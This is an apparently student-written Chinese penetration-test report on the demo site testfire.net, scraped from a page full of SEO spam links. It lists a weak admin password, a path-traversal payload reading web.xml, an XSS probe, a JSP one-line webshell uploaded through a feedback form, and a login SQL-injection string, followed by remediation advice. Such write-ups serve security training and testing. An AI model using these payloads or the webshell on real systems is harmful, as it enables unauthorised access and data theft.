当前位置: 首页 > news >正文

wordpress iframe页面佛山百度seo代理

wordpress iframe页面,佛山百度seo代理,网站制作哪家专业,查看域名注册信息www.testfire.nets渗透测试报告 一、测试综述 1.1.测试⽬的 通过实施针对性的渗透测试,发现testfire.net⽹站的安全漏洞,锻炼自己的渗透水平 1.2.测试范围 域名:www.testfire.net IP:65.61.137.117 测试时间: 2023年11月…

www.testfire.nets渗透测试报告

一、测试综述

1.1.测试⽬的

通过实施针对性的渗透测试,发现testfire.net⽹站的安全漏洞,锻炼自己的渗透水平

1.2.测试范围

域名:www.testfire.net 

IP:65.61.137.117
测试时间: 2023年11月21日

说明: 本次使用的渗透过程中使用的ip:192.168.85.128

1.3.数据来源

通过漏洞扫描和⼿动分析获取相关数据。

二、测试工具

根据测试的范围,本次渗透测试可能⽤到的相关⼯具列表如下:

(1)在线域名转化IP:在线IP查询工具-支持本机外网,域名_蛙蛙工具 (iamwawa.cn)

(2)Nmap: 进行目标端口的扫描

(3)dirsearch: 进行网站目录的扫描

(4)Burp抓包

三、渗透过程

3.1 信息收集

使用ping命令发现对方的ttl为105 可预知对方的操作系统为windows

使用nmap进行端口扫描 65.61.137.117

我们发现只有80网页端口进行开放,说明我们目前根据这个结果只能进行网页的渗透

根据这点我们使用dirsearch进行网站目录扫描

因为扫出的目录比较多,但很明显存在一个后台登入路径/admin 然后还可能存在一个目录穿越读取文件的漏洞 ,针对这个,我们还是先进入后台

所以说信息收集总结就是:

目标 www.testfire.net 服务器地址:65.61.137.117,开启了80 HTTP、443 HTTPS服务,可能存在后台登入等漏洞

3.2 漏洞挖掘

3.2.1 后台管理员弱口令登入漏洞

我们进入后台发现存在弱口令admin/admin直接可以进入后台

我们成功进入后台后,我们就可以进行下一步的渗透了

3.2.2 index.jsp路径下存在 web.xml配置文件泄露漏洞

首先我们在后台源码发现了如下路径

我们访问看看这个页面然后进行下一步的测试

经过测试,我们发现读取/etc/passwd等重要文件不行,说明网站的防护还是可以的

不过测试发现服务器为服务器信息:windows-Apache Tomcat/7.0.92。

但是经过努力,发现他是直接可以读取web.xml 的网站配置信息

Payload:http://65.61.137.117/index.jsp?content=../WEB-INF/web.xml

 

通过这个我们得知了配置信息后 可以进行后续的准备更高级的攻击。

3.2.3 search框存在xss漏洞

在search框进行搜索的时候,发现存在xss漏洞

Payload:<script>alert("2100101628xuwenlong")</script>

 

 

点击go  输出为 2100101628xuwenlong

通过XSS漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。如果是存储型XSS,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。

3.2.4 反馈页面存在任意文件上传漏洞

我们进入反馈页面 发现能够上传任意文件 如下

我们尝试修改文件内容为一句话 JSP webshell, 

木马内容为:

<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%> 

然后上传wenda.jsp

发现能够上传 却找不到文件上传的路径,由于是测试网站,甚至怀疑这里并没有做实际的保存工作,而只是返回了结果信息。

3.2.5 登入存在sql注入

Payload:

username:a 'OR 1=1--+

密码 随意

登入成功

以上就是该网站的漏洞挖掘过程

四、漏洞评级

(1)后台弱口令登入管理员漏洞:中危

管理员用户功能不是很多,主要包括可以管理用户(更改管理员密码、创建用户)、信息查询(可以尝试进行SQL注入)、转账功能(此处无二次验证功能,在实际网站中,敏感业务操作设计应引入二次鉴权机制)

(2)index.jsp路径下存在 web.xml配置文件泄露漏洞 :中危

如果文件目录下有更多的敏感信息,那么危害会更大,攻击者根据配置信息,可采用远程攻击网站造成网站的破坏

(3)search框存在xss漏洞:  低危

通过XSS漏洞,可以获取用户 Cookie 等信息,以实现进一步渗透。

如果是存储型XSS,那么还可以通过设置钓鱼登录框,将用户填写的账号、密码表单信息发送到攻击者所指定的网络位置。

(4)反馈页面存在任意文件上传漏洞 : 低危

因为可能是个测试网站,没有文件路径,所以但是还是能上传一句话木马,攻击者可通过一些攻击工具像weblogic实现不需要路径的getshell,来进行提权

(5)登入存在sql注入:高危

用户通过发现注入后可采取sqlmap进行网站的数据库爬取,造成数据的流失

五、修复建议

1.防止SQL注入,最有效的方法就是限制输入、参数化传递 用户提交的数据,显然这里并没有进行有效防护,测试发现登录页面存在SQL注入漏洞

2.后台弱口令应该设置验证码或者强口令登入

3.防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入完全传递给文件系统API。

如果认为不可避免的是将用户提供的输入传递给文件系统API,则应同时使用两层防御,以防止受到攻击:

(1)应用程序应在处理之前验证用户输入。理想情况下,验证应与允许值的白名单进行比较。如果所需的功能无法做到这一点,则验证应验证输入内容仅包含允许的内容,例如纯字母数字字符。

(2)验证提供的输入后,应用程序应将输入附加到基本目录,并使用平台文件系统API规范化路径。验证规范化路径以预期的基本目录开头。

4.修复对web.xml访问权限 可直接删除docs目录和examples目录

5.XSS漏洞修复课采取对输入的数据进行HTML转义,使其不会识别为可执行脚本,和白名单过滤等方法

6.文件上传漏洞给出的修复建议为:

1. 服务器配置:

2. 在服务端对上传文件进行检查:

3. 对于图片文件进行二次渲染、压缩, 避免图片写马。

4. 校验失败后,记录错误日志信息,内容至少包括时间、用户、IP、操作内容、校验失败的

http://www.fp688.cn/news/160316.html

相关文章:

  • 手游传奇网站999服百度推广登录
  • 开发工具都有哪些广州百度seo
  • 信息作业网站下载传播易广告投放平台
  • 本地搭建网站ip软件点击百度竞价推广
  • 做免费导航网站石家庄seo推广优化
  • 自己建立网站的方法万网建站
  • 支持asp的免费空间 适合钓鱼网站苏州网络公司
  • 成都模板网站建设品牌网络推广外包
  • 苏州网站制作公司运营商大数据精准营销获客
  • 电脑网站页面怎么调大小百度网站优化培训
  • 小程序如何推广西安百度关键词优化排名
  • 我的世界怎么做购买点卷网站东莞搜索引擎推广
  • 江门市华企立方科技有限公司百度seo查询
  • 网站服务器的费用上海百度seo公司
  • 网站推广排名最新报价免费b站动漫推广网站2023
  • 企业网站备案要多久确认已有81人感染
  • 多用户网站建设方案外贸推广哪个公司好
  • 网站制作群系统制作app软件平台
  • 专做排版网站2345浏览器网站进入
  • 七牛云如何做网站缓存企业网站设计
  • 免费做电子章网站产品推广广告
  • 音乐网站程序源码洛阳网站建设优化
  • 手机做任务的网站有哪些内容电商网站建设哪家好
  • 全球搜索引擎网站排名网
  • 949公社最新招聘今天seo课程
  • 新疆生产建设兵团第二中学招生报名网站网站建设维护
  • 大德通网站建设营销网站建设免费
  • 云南省建设工程造价管理协会网站网站设计费用
  • 网站开发用什么工具百度推广首页
  • 百度做网站引流成人培训班有哪些课程